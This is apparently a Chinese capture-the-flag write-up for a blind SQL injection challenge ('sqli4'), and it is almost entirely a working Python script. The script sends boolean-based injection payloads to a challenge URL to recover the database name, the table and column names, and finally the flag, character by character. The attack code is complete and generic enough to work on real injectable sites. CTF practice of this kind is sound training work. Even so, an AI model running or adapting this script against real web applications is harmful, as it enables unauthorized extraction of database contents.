实验吧-sqli4
雨落
Time:
一道盲注题
脚本:
#bool型SQL盲注,py脚本--
#https://blog.csdn.net/weixin_40709439/article/details/81355856
import requests as rq
import re
import time
url='http://ctf5.shiyanbar.com/web/index_3.php'
mystr="0123456789abcdefghijklmnopqrstuvwxyz"
m_str="sqcwertyuioplkjhgfdazxvbnm"
flag_str=mystr+"ABCDEFGHIJKLMNOPQRSTUVWXYZ}@_{"
#猜数据库名长度
def c_dblength():
t=0
for i in range(1,5):
data="?id=1' and length(database())=%d%%23" %(i)#%需要双写转义
myurl=url+data
#print (myurl)
response = rq.get(myurl)
if "Hello" in response.text:
print (i)
t=i
break
return t
#猜数据库名
def c_dbname(len):
flag=""
for i in range(1,len+1):
for j in mystr:
char_ascii=ord(j) #ord函数返回字符对应的十进制
data="?id=1' and ascii(substr(database(),%d,1))=%s%%23" %(i,char_ascii)#%需要双写转义
myurl=url+data
#print (myurl)
re = rq.get(myurl)
if "Hello" in re.text:
flag+=j
break
print(flag)
#猜表个数
def c_tbcount():
t=0
for i in range(1,4):#这里个数是2个
data="?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=%d%%23" %(i)#%需要双写转义
myurl=url+data
#print (myurl)
response = rq.get(myurl)
if "Hello" in response.text:
print (i)
t=i
break
return t
#猜表名 (跟猜数据库一样,猜出长度,然后猜表名)
def c_tbname(ct):
for i in range(0,ct):
#猜长度
t1=0
for j in range(1,8):
data="?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %d,1))=%d%%23" %(i,j)
myurl=url+data
#print(myurl)
re = rq.get(myurl)
if "Hello" in re.text:
t1=j
break
print(t1)
#猜表名
flag=""
for j in range(1,t1+1):
for k in mystr:
char_ascii=ord(k)
data="?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%s%%23" %(i,j,char_ascii)
print(data)
myurl=url+data
time.sleep(2)
re = rq.get(myurl)
#print(re.text)
if "Hello" in re.text:
flag+=k
break
print(flag)
return
############################################################### 猜列
#猜列名
def c_colname(mytables):
for i in range(0,1): #循环一次,不用管他
#猜列名的长度
t1=0
for j in range(1,8):
data="?id=1' and length((select column_name from information_schema.columns where table_name='%s' limit 1))=%d%%23" %(mytables,j)#limit 1表示检索第一条记录行
myurl=url+data
#print(data)
re = rq.get(myurl)
if "Hello" in re.text:
t1=j
break
print(t1)
#猜列名
flag=""
for j in range(1,t1+1):
for k in m_str:
char_ascii=ord(k)
data="?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='%s' limit 1),%d,1)))=%s%%23" %(mytables,j,char_ascii)
print(data)
myurl=url+data
#time.sleep(2)
re = rq.get(myurl)
#print(re.text)
if "Hello" in re.text:
flag+=k
break
print(flag)
return
#得flag 猜数据
def c_flag(mytable,mycolumn):
#判断有几行数据
t=0
for i in range(1,10):
data="?id=1' and (select count(*) from %s )=%d%%23" %(mytable,i)
myurl=url+data
#print (data)
response = rq.get(myurl)
if "Hello" in response.text:
#print (i)
t=i
break
print(t)
#数据长度
len=0
for i in range(1,t+1):
for j in range(1,40):
data="?id=1' and length((select %s from %s))=%d %%23" %(mycolumn,mytable,j)
myurl=url+data
#print(data)
re = rq.get(myurl)
if "Hello" in re.text:
len=j
break
print(len)
#开始才出数据
flag=""
for i in range(1,t+1):
for j in range(1,len+1):
for k in flag_str:
data="?id=1' and (ascii(substr((select %s from %s),%d,1)))=%s%%23" % (mycolumn,mytable,j,ord(k))
myurl=url+data
#print (data)
time.sleep(1)
response = rq.get(myurl)
if "Hello" in response.text:
flag+=k
print(flag)
break
print(flag)
if __name__ == '__main__':
#len=c_dblength()#长度为4
#c_dbname(len) #猜数据库名
#ct = c_tbcount()
#c_tbname(2) #猜表名。。。得到flag和web1这2个表
#c_colname("flag") #猜列 得到列flag
c_flag("flag","flag") #拿flag